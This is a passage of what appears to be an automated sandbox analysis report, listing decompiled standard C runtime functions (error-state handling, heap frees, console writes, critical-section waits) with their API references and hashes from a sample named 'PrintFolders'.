					E00419C49(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x43d1c8; // 0x7
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E0041E7DF(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E0041E25B(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E0041E7DF(__eflags,  *0x43d1c8, _t60);
								if(__eflags != 0) {
									E0041C991(_t60, 0x4508d8);
									E0041E2B8(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E0041E7DF(__eflags,  *0x43d1c8, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E0041E7DF(__eflags,  *0x43d1c8, _t20);
								_push(_t60);
								L25:
								E0041E2B8();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E0041E7A0(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x43d1c8; // 0x7
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E00419C49(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x43d1c8; // 0x7
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E0041E7DF(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E0041E25B(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E0041E7DF(__eflags,  *0x43d1c8, _t54);
											if(__eflags != 0) {
												E0041C991(_t54, 0x4508d8);
												E0041E2B8(0);
												goto L45;
											} else {
												_t40 = 0;
												E0041E7DF(__eflags,  *0x43d1c8, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E0041E7DF(0,  *0x43d1c8, 0);
											_push(0);
											L41:
											E0041E2B8();
											goto L36;
										}
									}
								} else {
									_t54 = E0041E7A0(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x43d1c8; // 0x7
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x0041cb63
0x0041cb63
0x0041cb6e
0x0041cb70
0x0041cb75
0x0041cb78
0x0041cb96
0x0041cb99
0x0041cb9e
0x0041cba0
0x00000000
0x0041cba2
0x0041cbae
0x0041cbb1
0x0041cbb2
0x0041cbb4
0x0041cbd9
0x0041cbdb
0x0041cbf4
0x0041cbfb
0x0041cc00
0x00000000
0x0041cbdd
0x0041cbdd
0x0041cbe6
0x0041cbeb
0x00000000
0x0041cbeb
0x0041cbb6
0x0041cbb6
0x0041cbb6
0x0041cbbf
0x0041cbc4
0x0041cbc5
0x0041cbc5
0x0041cbca
0x00000000
0x0041cbca
0x0041cbb4
0x0041cb7a
0x0041cb80
0x0041cb84
0x0041cb91
0x00000000
0x0041cb86
0x0041cb89
0x0041cc03
0x0041cc03
0x0041cb8b
0x0041cb8b
0x0041cb8b
0x0041cb8d
0x0041cb8d
0x0041cb8d
0x0041cb89
0x0041cb84
0x0041cc06
0x0041cc0e
0x0041cc10
0x0041cc12
0x0041cc1a
0x0041cc1f
0x0041cc20
0x0041cc25
0x0041cc26
0x0041cc29
0x0041cc43
0x0041cc46
0x0041cc4b
0x0041cc4d
0x00000000
0x0041cc4f
0x0041cc5b
0x0041cc5e
0x0041cc5f
0x0041cc61
0x0041cc84
0x0041cc86
0x0041cc9d
0x0041cca4
0x0041cca9
0x00000000
0x0041cc88
0x0041cc8f
0x0041cc94
0x00000000
0x0041cc94
0x0041cc63
0x0041cc6a
0x0041cc6f
0x0041cc70
0x0041cc70
0x0041cc75
0x00000000
0x0041cc75
0x0041cc61
0x0041cc2b
0x0041cc31
0x0041cc33
0x0041cc35
0x0041cc3e
0x00000000
0x0041cc37
0x0041cc37
0x0041cc3a
0x0041ccb4
0x0041ccb4
0x0041ccb9
0x0041ccbc
0x0041ccbd
0x0041ccbe
0x0041ccc5
0x0041ccc7
0x0041cccc
0x0041cccf
0x0041cced
0x0041ccf0
0x0041ccf5
0x0041ccf7
0x00000000
0x0041ccf9
0x0041cd05
0x0041cd09
0x0041cd0b
0x0041cd30
0x0041cd32
0x0041cd4b
0x0041cd52
0x00000000
0x0041cd34
0x0041cd34
0x0041cd3d
0x0041cd42
0x00000000
0x0041cd42
0x0041cd0d
0x0041cd0d
0x0041cd0d
0x0041cd16
0x0041cd1b
0x0041cd1c
0x0041cd1c
0x00000000
0x0041cd21
0x0041cd0b
0x0041ccd1
0x0041ccd7
0x0041ccd9
0x0041ccdb
0x0041cce8
0x00000000
0x0041ccdd
0x0041ccdd
0x0041cce0
0x0041cd5a
0x0041cd5a
0x0041cce2
0x0041cce2
0x0041cce2
0x0041cce2
0x0041cce4
0x0041cce4
0x0041cce4
0x0041cce0
0x0041ccdb
0x0041cd5d
0x0041cd65
0x0041cd67
0x0041cd67
0x0041cd6e
0x0041cc3c
0x0041ccac
0x0041ccac
0x0041ccae
0x00000000
0x0041ccb0
0x0041ccb3
0x0041ccb3
0x0041ccae
0x0041cc3a
0x0041cc35
0x0041cc14
0x0041cc19
0x0041cc19

APIs

GetLastError.KERNEL32(?,?,?,00413661,?,00000000,00405D9E,?,00418194,?,00000000,74CB6490,?,0041828D,00405D9E,00000000), ref: 0041CB68
_free.LIBCMT ref: 0041CBC5
_free.LIBCMT ref: 0041CBFB
SetLastError.KERNEL32(00000000,00000007,000000FF,?,00418194,?,00000000,74CB6490,?,0041828D,00405D9E,00000000,?,00405D9E,?), ref: 0041CC06

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 3abb266c486aac477022de17da07e4251c7c1e35108d8638f05dcf1e3eb67359
Instruction ID: 91b981631096f111d83687cb3943ae5f68f73b373ba64f4aa9f78fd4ccd23e5c
Opcode Fuzzy Hash: 3abb266c486aac477022de17da07e4251c7c1e35108d8638f05dcf1e3eb67359
Instruction Fuzzy Hash: 2411CA766881006BDB1526776CC6EEB21599BC0778B24023BF528D32D1EE6D8CC2516D

Uniqueness

Uniqueness Score: -1.00%

Function 10007D03 Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E10007D03(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x10017100; // 0xa
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E100082D2(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E10008BFC(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E100082D2(__eflags,  *0x10017100, _t18);
							if(__eflags != 0) {
								E100079AE(_t18, 0x10018108);
								E10008701(0);
								goto L13;
							} else {
								_t13 = 0;
								E100082D2(__eflags,  *0x10017100, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E100082D2(0,  *0x10017100, 0);
							_push(0);
							L9:
							E10008701();
							goto L4;
						}
					}
				} else {
					_t18 = E10008293(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x10017100; // 0xa
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x10007d0e
0x10007d10
0x10007d15
0x10007d18
0x10007d36
0x10007d39
0x10007d3e
0x10007d40
0x00000000
0x10007d42
0x10007d4e
0x10007d52
0x10007d54
0x10007d79
0x10007d7b
0x10007d94
0x10007d9b
0x00000000
0x10007d7d
0x10007d7d
0x10007d86
0x10007d8b
0x00000000
0x10007d8b
0x10007d56
0x10007d56
0x10007d56
0x10007d5f
0x10007d64
0x10007d65
0x10007d65
0x00000000
0x10007d6a
0x10007d54
0x10007d1a
0x10007d20
0x10007d24
0x10007d31
0x00000000
0x10007d26
0x10007d29
0x10007da3
0x10007da3
0x10007d2b
0x10007d2b
0x10007d2b
0x10007d2d
0x10007d2d
0x10007d2d
0x10007d29
0x10007d24
0x10007da6
0x10007dae
0x10007db7

APIs

GetLastError.KERNEL32(?,?,?,1000640B,10008727,?,?,100074AC), ref: 10007D08
_free.LIBCMT ref: 10007D65
_free.LIBCMT ref: 10007D9B
SetLastError.KERNEL32(00000000,0000000A,000000FF,?,?,1000640B,10008727,?,?,100074AC), ref: 10007DA6

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: a1b51e29a2483d9d067290d82e8b33bd0401e2047f5f7481da3912e5413e3180
Instruction ID: 68182e47bee727d8c9ea21c39a6ce122361ce54ca7b3a3919661bbd41b246de3
Opcode Fuzzy Hash: a1b51e29a2483d9d067290d82e8b33bd0401e2047f5f7481da3912e5413e3180
Instruction Fuzzy Hash: 38110476B04615BAF212D7788CC1D2B26BAFFC02F0B314226F56C821EEDE75ED514221

Uniqueness

Uniqueness Score: -1.00%

Function 0041CCBA Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0041CCBA(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x43d1c8; // 0x7
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E0041E7DF(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E0041E25B(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E0041E7DF(__eflags,  *0x43d1c8, _t18);
							if(__eflags != 0) {
								E0041C991(_t18, 0x4508d8);
								E0041E2B8(0);
								goto L13;
							} else {
								_t13 = 0;
								E0041E7DF(__eflags,  *0x43d1c8, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E0041E7DF(0,  *0x43d1c8, 0);
							_push(0);
							L9:
							E0041E2B8();
							goto L4;
						}
					}
				} else {
					_t18 = E0041E7A0(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x43d1c8; // 0x7
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x0041ccc5
0x0041ccc7
0x0041cccc
0x0041cccf
0x0041cced
0x0041ccf0
0x0041ccf5
0x0041ccf7
0x00000000
0x0041ccf9
0x0041cd05
0x0041cd09
0x0041cd0b
0x0041cd30
0x0041cd32
0x0041cd4b
0x0041cd52
0x00000000
0x0041cd34
0x0041cd34
0x0041cd3d
0x0041cd42
0x00000000
0x0041cd42
0x0041cd0d
0x0041cd0d
0x0041cd0d
0x0041cd16
0x0041cd1b
0x0041cd1c
0x0041cd1c
0x00000000
0x0041cd21
0x0041cd0b
0x0041ccd1
0x0041ccd7
0x0041ccdb
0x0041cce8
0x00000000
0x0041ccdd
0x0041cce0
0x0041cd5a
0x0041cd5a
0x0041cce2
0x0041cce2
0x0041cce2
0x0041cce4
0x0041cce4
0x0041cce4
0x0041cce0
0x0041ccdb
0x0041cd5d
0x0041cd65
0x0041cd6e

APIs

GetLastError.KERNEL32(?,?,?,004135F6,0041ED72,?,?,0040FF9B,?,?,?,?,?,00403757,?,?), ref: 0041CCBF
_free.LIBCMT ref: 0041CD1C
_free.LIBCMT ref: 0041CD52
SetLastError.KERNEL32(00000000,00000007,000000FF,?,0040FF9B,?,?,?,?,?,00403757,?,?,?), ref: 0041CD5D

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: e8b5fd6ac6bcdbc63dd879f339bbd85be9c8e0b1b4a1cafcd1e0970895d8910c
Instruction ID: 9b62fba310747dd0c1bf6bb4efed2382b058d2b05c29c2c7201b5ba533af619d
Opcode Fuzzy Hash: e8b5fd6ac6bcdbc63dd879f339bbd85be9c8e0b1b4a1cafcd1e0970895d8910c
Instruction Fuzzy Hash: C011AC367442006BDB11277B6CC5DE72659ABC1779724023BF92C931D1ED6D8CC2456D

Uniqueness

Uniqueness Score: -1.00%

Function 0043F031 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043F04D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043F066

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: bbd0fb90c6f543932e03e6b2f5c9411f0a441a56121ea3fd60b0444541a7708f
Instruction ID: 2f914ca0b150f54681f4df5d10c51623e56e86357141abab0502ee71ee4cbc58
Opcode Fuzzy Hash: bbd0fb90c6f543932e03e6b2f5c9411f0a441a56121ea3fd60b0444541a7708f
Instruction Fuzzy Hash: 80012D33D083119DA62967BDBC855AB2B65DB1C378F20133FF620902F2EF594C19914C

Uniqueness

Uniqueness Score: -1.00%

Function 1000E591 Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000E591(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x10017850, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E1000E57A();
					E1000E53C();
					_t13 = WriteConsoleW( *0x10017850, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x1000e5ae
0x1000e5b2
0x1000e5bf
0x1000e5c4
0x1000e5df
0x1000e5df
0x1000e5e5

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000D988,?,00000001,?,00000001,?,1000C4AB,?,?,00000001), ref: 1000E5A8
GetLastError.KERNEL32(?,1000D988,?,00000001,?,00000001,?,1000C4AB,?,?,00000001,?,00000001,?,1000C9F7,10008E0A), ref: 1000E5B4

Part of subcall function 1000E57A: CloseHandle.KERNEL32(FFFFFFFE,1000E5C4,?,1000D988,?,00000001,?,00000001,?,1000C4AB,?,?,00000001,?,00000001), ref: 1000E58A

___initconout.LIBCMT ref: 1000E5C4

Part of subcall function 1000E53C: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000E56B,1000D975,00000001,?,1000C4AB,?,?,00000001,?), ref: 1000E54F

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000D988,?,00000001,?,00000001,?,1000C4AB,?,?,00000001,?), ref: 1000E5D9

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: db033fb1b874636e85d330483b63d37f63c04bcfd1e8b3716c06f70c47e2a96d
Instruction ID: b377c5219626dc8a0c0ad289bd514fd869925b16e60f045967f437c28a647ed1
Opcode Fuzzy Hash: db033fb1b874636e85d330483b63d37f63c04bcfd1e8b3716c06f70c47e2a96d
Instruction Fuzzy Hash: F4F03036540569BBEF12AFA1CC49A8A3F66FB083E1F018410FE48A5131DA32CD20DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0042B7F2 Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0042B7F2(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x43da90, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E0042B7DB();
					E0042B79D();
					_t13 = WriteConsoleW( *0x43da90, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x0042b80f
0x0042b813
0x0042b820
0x0042b825
0x0042b840
0x0042b840
0x0042b846

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,00000000,?,0042A4F6,00000000,00000001,00000000,00000000,?,00420B92,?,00000000,00000000), ref: 0042B809
GetLastError.KERNEL32(?,0042A4F6,00000000,00000001,00000000,00000000,?,00420B92,?,00000000,00000000,?,00000000,?,004210DE,?), ref: 0042B815

Part of subcall function 0042B7DB: CloseHandle.KERNEL32(FFFFFFFE,0042B825,?,0042A4F6,00000000,00000001,00000000,00000000,?,00420B92,?,00000000,00000000,?,00000000), ref: 0042B7EB

___initconout.LIBCMT ref: 0042B825

Part of subcall function 0042B79D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0042B7CC,0042A4E3,00000000,?,00420B92,?,00000000,00000000,?), ref: 0042B7B0

WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,?,0042A4F6,00000000,00000001,00000000,00000000,?,00420B92,?,00000000,00000000,?), ref: 0042B83A

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 3771de78c200026101a5c29d47a2f31da0f5e9a11cf076d30a3b181c11986b3a
Instruction ID: ac75466029322dda25ac2c1e9c6ff5057a4b7c88608daf2fa63318e0ae8d8abe
Opcode Fuzzy Hash: 3771de78c200026101a5c29d47a2f31da0f5e9a11cf076d30a3b181c11986b3a
Instruction Fuzzy Hash: 98F03736600129BBCF222FD2EC05D9A3F26FB443B0B444025F90D96531C73288709BD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040EFD1 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040EFD1(long _a4) {
				long _t3;
				intOrPtr* _t7;

				_t7 =  *0x450514;
				if(_t7 == 0) {
					LeaveCriticalSection(0x4504fc);
					_t3 = WaitForSingleObjectEx( *0x4504f8, _a4, 0);
					EnterCriticalSection(0x4504fc);
					return _t3;
				}
				 *0x42e234(0x4504f4, 0x4504fc, _a4);
				return  *_t7();
			}

0x0040efd5
0x0040efdd
0x0040effe
0x0040f00f
0x0040f016
0x00000000
0x0040f016
0x0040efee
0x00000000

APIs

SleepConditionVariableCS.KERNELBASE(?,0040EF6D,00000064), ref: 0040EFF4
LeaveCriticalSection.KERNEL32(004504FC,004063FC,?,0040EF6D,00000064,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EFFE
WaitForSingleObjectEx.KERNEL32(004063FC,00000000,?,0040EF6D,00000064,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040F00F
EnterCriticalSection.KERNEL32(004504FC,?,0040EF6D,00000064,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040F016

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: f64a1fe2d3c08a56fcd9346185c77cb8d93b1cbc53ddc582fa2c2fd8cd520f41
Instruction ID: 4c9c1218df18ba92a0a868e9c99513ef249696396432c8a4148075b9a22993ac
Opcode Fuzzy Hash: f64a1fe2d3c08a56fcd9346185c77cb8d93b1cbc53ddc582fa2c2fd8cd520f41
Instruction Fuzzy Hash: 0AE09235681225FBCA212B51EC08A9E7F18AF06752B004032FE0566262CB7568119BDD

Uniqueness

Uniqueness Score: -1.00%

Function 100075A4 Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100075A4() {

				E10008701( *0x100180fc);
				 *0x100180fc = 0;
				E10008701( *0x10018100);
				 *0x10018100 = 0;
				E10008701( *0x10018330);
				 *0x10018330 = 0;
				E10008701( *0x10018334);
				 *0x10018334 = 0;
				return 1;
			}

0x100075ad
0x100075ba
0x100075c0
0x100075cb
0x100075d1
0x100075dc
0x100075e2
0x100075ea
0x100075f3

APIs

_free.LIBCMT ref: 100075AD

Part of subcall function 10008701: RtlFreeHeap.NTDLL(00000000,00000000,?,100074AC), ref: 10008717
Part of subcall function 10008701: GetLastError.KERNEL32(?,?,100074AC), ref: 10008729

_free.LIBCMT ref: 100075C0
_free.LIBCMT ref: 100075D1
_free.LIBCMT ref: 100075E2

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 560e9729131f36da597d803f7365e1613d92c0d7e1160fc99f91f24202a3e63e
Instruction ID: 11fb011ea0374647b44fdc306d41bcbb37fa874d581b786af2f79b002bb734ee
Opcode Fuzzy Hash: 560e9729131f36da597d803f7365e1613d92c0d7e1160fc99f91f24202a3e63e
Instruction Fuzzy Hash: 82E0EC79825130EBFB52AF149CC28493E66FB58B803A5C00AF86812239D732D7529FA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC67 Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041AC67() {

				E0041E2B8( *0x450bd0);
				 *0x450bd0 = 0;
				E0041E2B8( *0x450bd4);
				 *0x450bd4 = 0;
				E0041E2B8( *0x450cd0);
				 *0x450cd0 = 0;
				E0041E2B8( *0x450cd4);
				 *0x450cd4 = 0;
				return 1;
			}

0x0041ac70
0x0041ac7d
0x0041ac83
0x0041ac8e
0x0041ac94
0x0041ac9f
0x0041aca5
0x0041acad
0x0041acb6

APIs

_free.LIBCMT ref: 0041AC70

Part of subcall function 0041E2B8: HeapFree.KERNEL32(00000000,00000000,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?), ref: 0041E2CE
Part of subcall function 0041E2B8: GetLastError.KERNEL32(?,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?,?), ref: 0041E2E0

_free.LIBCMT ref: 0041AC83
_free.LIBCMT ref: 0041AC94
_free.LIBCMT ref: 0041ACA5

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7600757227941bb7c95799b95531e21e679b1f58566f426ab12c79b805c51534
Instruction ID: 302bd469a5a2dc94dd6d614bbecc9892323fc590e190cb025f464d2d07f9e9ff
Opcode Fuzzy Hash: 7600757227941bb7c95799b95531e21e679b1f58566f426ab12c79b805c51534
Instruction Fuzzy Hash: F8E04F7F410360BF960A2F56BC51685BA25B75570AB4002ABFC0436233CB759051AB8D

Uniqueness

Uniqueness Score: -1.00%

Function 00403B40 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E00403B40(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
				intOrPtr _v8;
				char _v16;
				char _v24;
				signed int _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v92;
				intOrPtr _v96;
				void* _v116;
				signed int _v132;
				void* __esi;
				void* __ebp;
				signed int _t71;
				signed int _t72;
				intOrPtr _t81;
				intOrPtr* _t87;
				intOrPtr _t96;
				void* _t109;
				void* _t111;
				char _t115;
				char _t118;
				intOrPtr* _t127;
				intOrPtr _t128;
				intOrPtr _t133;
				intOrPtr _t134;
				void* _t136;
				void* _t137;
				intOrPtr* _t141;
				void* _t142;
				intOrPtr* _t144;
				intOrPtr _t145;
				void* _t146;
				intOrPtr* _t147;
				signed int _t151;
				void* _t155;
				signed int _t158;
				void* _t159;

				_push(__ebx);
				_t111 = _t155;
				_t158 = (_t155 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t111 + 4));
				_t151 = _t158;
				_push(0xffffffff);
				_push(0x42c395);
				_push( *[fs:0x0]);
				_push(_t111);
				_t159 = _t158 - 0x58;
				_t71 =  *0x43d054; // 0x7bd02ead
				_t72 = _t71 ^ _t151;
				_v32 = _t72;
				_push(__edi);
				_push(_t72);
				 *[fs:0x0] =  &_v24;
				_t141 = __ecx;
				_v44 = __ecx;
				_v44 = __ecx;
				E0040BB90(_t111,  &_v68, __edx, __ecx,  *((intOrPtr*)(_t111 + 8)));
				_t144 =  *((intOrPtr*)(_t111 + 0x10));
				_v44 =  *((intOrPtr*)(_t111 + 0xc));
				_v16 = 0;
				_t115 = _v52;
				if(_t115 != 0) {
					if(_v48 - _t115 < 2) {
						_v36 = 0;
						E00402980(_t111,  &_v68, __ecx, _t144, 2, _v36, ": ", 2);
					} else {
						_v52 = _t115 + 2;
						_t109 =  >=  ? _v68 :  &_v68;
						 *((short*)(_t109 + _t115)) = 0x203a;
						 *((char*)(_t109 + _t115 + 2)) = 0;
					}
				}
				 *((intOrPtr*)( *_t144 + 8))( &_v92, _v44);
				_v16 = 1;
				_t118 = _v76;
				_t132 =  >=  ? _v92 :  &_v92;
				_t145 = _v52;
				_v44 = _t118;
				_push(_t118);
				_push( >=  ? _v92 :  &_v92);
				if(_t118 > _v48 - _t145) {
					_v44 = 0;
					_push(_v44);
					_push(_t118);
					_t81 = E00402980(_t111,  &_v68, _t141, _t145);
				} else {
					_v52 = _t145 + _t118;
					_t102 =  >=  ? _v68 :  &_v68;
					_t145 = _t145 + ( >=  ? _v68 :  &_v68);
					_push(_t145);
					E004104C0();
					_t81 = _v44;
					_t159 = _t159 + 0xc;
